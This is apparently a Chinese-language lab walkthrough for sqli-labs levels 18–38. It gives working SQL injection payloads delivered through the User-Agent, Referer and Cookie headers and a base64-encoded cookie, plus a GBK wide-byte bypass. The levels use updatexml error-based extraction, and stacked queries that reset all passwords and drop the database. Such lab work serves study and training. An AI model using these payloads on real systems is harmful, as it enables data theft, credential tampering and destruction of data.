目录
Less-18(HTTP---User-Agent)
1.登录
2.bp抓包
3.查看是否有回显
User-Agent: xx
4.查看错误
User-Agent: xx'
分隔 User-Agent: xx' and '1'='1
5.查看敏感信息
User-Agent: xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1'='1
Less-19(HTTP---Referer)
1.登录
2.bp抓包
3.查看是否有回显
Referer: xx
4.查看其错误
Referer: xx'
分隔 Referer: xx' and '1'='1
5.查看敏感信息
Referer: xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1'='1
Less-20(HTTP---Cookie)
1.登录
2.bp获取
3.是否有显示
Cookie: uname=xx
4.错误显示
Cookie: uname=xx'
5.敏感信息查询
Cookie: uname=xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) #
Less-22(HTTP---base64)
1.登录
2.bp抓包
3.查看是否有回显
这里为base64编码 RHVtYg%3D%3D 解码 dumb==
Cookie: uname=eHg= eHg= : xx
4.错误显示
Cookie: uname=eHgi eHgi : xx"
5.敏感信息查询
Cookie:uname=eHgiIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4NWUpLDEpICM= Cookie: uname=xx" and updatexml(1,concat(0x5e,(select database()),0x5e),1) #
Less-32(错误注入---gbk)
1.有显示
?id=1
2.错误显示
?id=2'
因为这里用的是gbk编码 GBK范围的编码 8140 - FEFE
?id=2%81' gbk编码:815c
3.查看敏感信息(错误注入)
?id=2%81' and updatexml(1,concat(0x5e,(select version()),0x5e),1) --+
Less-38(堆叠查询)
1.通过堆叠查询,修改所有用户密码为654321
?id=1';update users set password='123456';--+
2. 利用堆叠查询删库(危险!实战环境中千万不要)
?id=5';drop database security;--+